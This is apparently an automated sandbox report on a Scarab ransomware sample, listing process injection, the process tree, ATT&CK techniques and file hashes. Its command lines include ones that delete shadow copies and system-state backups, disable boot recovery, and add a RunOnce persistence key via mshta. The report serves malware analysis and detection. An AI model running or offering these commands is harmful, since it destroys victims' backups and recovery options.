Token: SeSecurityPrivilege	1800	WMIC.exe
Token: SeTakeOwnershipPrivilege	1800	WMIC.exe
Token: SeLoadDriverPrivilege	1800	WMIC.exe
Token: SeSystemProfilePrivilege	1800	WMIC.exe
Token: SeSystemtimePrivilege	1800	WMIC.exe
Token: SeProfSingleProcessPrivilege	1800	WMIC.exe
Token: SeIncBasePriorityPrivilege	1800	WMIC.exe
Token: SeCreatePagefilePrivilege	1800	WMIC.exe
Token: SeBackupPrivilege	1800	WMIC.exe
Token: SeRestorePrivilege	1800	WMIC.exe
Token: SeShutdownPrivilege	1800	WMIC.exe
Token: SeDebugPrivilege	1800	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1800	WMIC.exe
Token: SeRemoteShutdownPrivilege	1800	WMIC.exe
Token: SeUndockPrivilege	1800	WMIC.exe
Token: SeManageVolumePrivilege	1800	WMIC.exe
Token: 33	1800	WMIC.exe
Token: 34	1800	WMIC.exe
Token: 35	1800	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Scarab.exeScarab.exeScarab.exeScarab.exesevnz.exesevnz.exe

description	pid	process	target process
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2924 wrote to memory of 2932	2924	Scarab.exe	Scarab.exe
PID 2932 wrote to memory of 2696	2932	Scarab.exe	cmd.exe
PID 2932 wrote to memory of 2696	2932	Scarab.exe	cmd.exe
PID 2932 wrote to memory of 2696	2932	Scarab.exe	cmd.exe
PID 2932 wrote to memory of 2696	2932	Scarab.exe	cmd.exe
PID 2932 wrote to memory of 2824	2932	Scarab.exe	Scarab.exe
PID 2932 wrote to memory of 2824	2932	Scarab.exe	Scarab.exe
PID 2932 wrote to memory of 2824	2932	Scarab.exe	Scarab.exe
PID 2932 wrote to memory of 2824	2932	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2824 wrote to memory of 2716	2824	Scarab.exe	Scarab.exe
PID 2716 wrote to memory of 2740	2716	Scarab.exe	cmd.exe
PID 2716 wrote to memory of 2740	2716	Scarab.exe	cmd.exe
PID 2716 wrote to memory of 2740	2716	Scarab.exe	cmd.exe
PID 2716 wrote to memory of 2740	2716	Scarab.exe	cmd.exe
PID 2716 wrote to memory of 2456	2716	Scarab.exe	sevnz.exe
PID 2716 wrote to memory of 2456	2716	Scarab.exe	sevnz.exe
PID 2716 wrote to memory of 2456	2716	Scarab.exe	sevnz.exe
PID 2716 wrote to memory of 2456	2716	Scarab.exe	sevnz.exe
PID 2716 wrote to memory of 2488	2716	Scarab.exe	mshta.exe
PID 2716 wrote to memory of 2488	2716	Scarab.exe	mshta.exe
PID 2716 wrote to memory of 2488	2716	Scarab.exe	mshta.exe
PID 2716 wrote to memory of 2488	2716	Scarab.exe	mshta.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 2456 wrote to memory of 304	2456	sevnz.exe	sevnz.exe
PID 304 wrote to memory of 2604	304	sevnz.exe	mshta.exe
PID 304 wrote to memory of 2604	304	sevnz.exe	mshta.exe
PID 304 wrote to memory of 2604	304	sevnz.exe	mshta.exe
PID 304 wrote to memory of 2604	304	sevnz.exe	mshta.exe
PID 304 wrote to memory of 1824	304	sevnz.exe	cmd.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Scarab.exe
"C:\Users\Admin\AppData\Local\Temp\Scarab.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2924

C:\Users\Admin\AppData\Local\Temp\Scarab.exe
"C:\Users\Admin\AppData\Local\Temp\Scarab.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
3⤵
PID:2696

C:\Users\Admin\AppData\Local\Temp\Scarab.exe
"C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas
3⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2824

C:\Users\Admin\AppData\Local\Temp\Scarab.exe
"C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2716

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
5⤵
PID:2740

C:\Users\Admin\AppData\Roaming\sevnz.exe
"C:\Users\Admin\AppData\Roaming\sevnz.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2456

C:\Users\Admin\AppData\Roaming\sevnz.exe
"C:\Users\Admin\AppData\Roaming\sevnz.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:304

C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30}',i);}catch(e){}},10);"
7⤵
- Adds Run key to start application
- Modifies Internet Explorer settings
PID:2604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
7⤵
PID:1824

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE
7⤵
PID:2284

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
7⤵
PID:2980

C:\Windows\SysWOW64\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
8⤵
- Interacts with shadow copies
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
7⤵
PID:3032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
7⤵
PID:440

C:\Windows\SysWOW64\mshta.exe
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"
5⤵
- Deletes itself
- Modifies Internet Explorer settings
PID:2488

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:964

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT
Filesize
4KB

MD5
75d58f6991cd8c14f8fae8d315fac9b7

SHA1
28f1b8c1af3217ef6ef313c60f003c40afa28c75

SHA256
4681f1a0eb50e67ce0c73b6e1a3687676a534a5974b9c12cc81decb786f0988a

SHA512
e70a3658660d6870a66863251b07aa986219aaeb71280c733084444aa8ba2cd11b8432e38422b91400ddd499ed0590f35c1c71efa1dc82d448eaa107e61286bb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
7d9b95a446bfea47dadc70e8d1c0e5b0

SHA1
face50e28bc8f5292357d7886eb0dca1a40a197a

SHA256
d27d11ae0ba92ba2a105c3bf0d8b8896289413cd4dddce7b4b6784cb0ed3de7f

SHA512
71c4dafcfc419c9a2bf64dc7cb203e6fd79fbb3960d081356136bacbb0e6d348c25f6e1046ca36a78e3e2666992eac55ad1a965700e7642c55acc68dc9dc5c82

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabA24A.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarA859.tmp
Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Roaming\sevnz.exe
Filesize
342KB

MD5
6899003aaa63ab4397f9e32e0a1daf43

SHA1
c22272ff0944d127992b393562871473b23ef8ea

SHA256
53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5

SHA512
d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc

Download Submit
memory/304-166-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-167-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-196-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-195-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-189-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-188-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-181-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-175-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-174-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-168-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-159-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-158-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-71-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-72-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-69-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/304-70-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2456-50-0x00000000004D0000-0x00000000005D0000-memory.dmp

Filesize
1024KB

Download
memory/2716-39-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2716-47-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2716-38-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2824-26-0x0000000000510000-0x0000000000610000-memory.dmp

Filesize
1024KB

Download
memory/2924-2-0x0000000000530000-0x0000000000630000-memory.dmp

Filesize
1024KB

Download
memory/2932-6-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-12-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-4-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-14-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-8-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-10-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-24-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-21-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-20-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-19-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-18-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-1-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2932-16-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download